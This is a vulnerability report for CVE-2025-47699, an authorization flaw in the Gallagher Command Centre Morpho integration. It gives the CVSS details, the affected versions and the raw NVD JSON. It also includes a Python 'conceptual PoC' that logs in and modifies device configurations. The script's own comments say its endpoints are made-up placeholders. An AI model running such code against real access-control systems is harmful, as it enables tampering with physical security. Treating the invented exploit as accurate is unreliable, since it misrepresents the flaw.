Security Vulnerability Report
CVE-2025-47699 CVSS 9.9 CRITICAL

Published: 2025-10-23 04:16:40
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere (CWE-497) in the Gallagher Morpho integration could allow an authenticated operator with limited site permissions to make critical changes to local Morpho devices. This issue affects Command Centre Server: 9.30 prior to vEL9.30.2482 (MR2), 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

Gallagher Command Centre Server 9.30 < vEL9.30.2482 (MR2)
Gallagher Command Centre Server 9.20 < vEL9.20.2819 (MR4)
Gallagher Command Centre Server 9.10 < vEL9.10.3672 (MR7)
Gallagher Command Centre Server 9.00 < vEL9.00.3831 (MR8)
Gallagher Command Centre Server 8.90 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-47699 Gallagher Morpho Integration - PoC Concept
# This is a conceptual PoC demonstrating the authorization bypass
# Note: Actual exploitation requires valid credentials with limited permissions
import requests

# Placeholder host and paths used by this conceptual PoC; they are not taken
# from the vendor advisory and do not describe a documented Command Centre API.
TARGET = "https://target-gallagher-server.com"
LOGIN_ENDPOINT = "/api/auth/login"
MORPHO_API_ENDPOINT = "/api/morpho/devices"
CVE_ID = "CVE-2025-47699"


def authenticate(username, password):
    """Authenticate with limited permissions"""
    session = requests.Session()
    login_data = {
        "username": username,
        "password": password
    }
    response = session.post(f"{TARGET}{LOGIN_ENDPOINT}", json=login_data)
    if response.status_code == 200:
        return session, response.json().get('token')
    return None, None


def exploit_morpho_access(session, token):
    """
    Exploit CVE-2025-47699: Bypass authorization to access Morpho devices
    This endpoint should require higher privileges but is accessible with limited permissions
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # Attempt to access Morpho device configuration (should be restricted)
    response = session.get(f"{TARGET}{MORPHO_API_ENDPOINT}", headers=headers)
    if response.status_code == 200:
        devices = response.json()
        print("[!] Successfully accessed Morpho devices with limited permissions")
        print(f"[+] Found {len(devices)} devices")
        return devices
    else:
        print(f"[-] Access denied: {response.status_code}")
        return None


def modify_morpho_device(session, token, device_id, malicious_config):
    """Modify Morpho device configuration - critical changes"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # Attempt to modify device configuration
    modify_endpoint = f"{TARGET}{MORPHO_API_ENDPOINT}/{device_id}"
    response = session.put(modify_endpoint, headers=headers, json=malicious_config)
    if response.status_code == 200:
        print(f"[!] Successfully modified Morpho device {device_id}")
        return True
    return False


if __name__ == "__main__":
    # The script as published only announces itself; no request is sent here.
    print(f"[*] Testing {CVE_ID} - Gallagher Morpho Authorization Bypass")
    print("[*] Requires valid credentials with limited site permissions")
```

References

https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-47699

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-47699",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-23T04:16:40.423",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere (CWE-497) in the Gallagher Morpho integration could allow an authenticated operator with limited site permissions to make critical changes to local Morpho devices. \n\nThis issue affects Command Centre Server:\n\n9.30 prior to vEL9.30.2482 (MR2), 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-497"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-47699",
        "source": "[email protected]"
      }
    ]
  }
}
```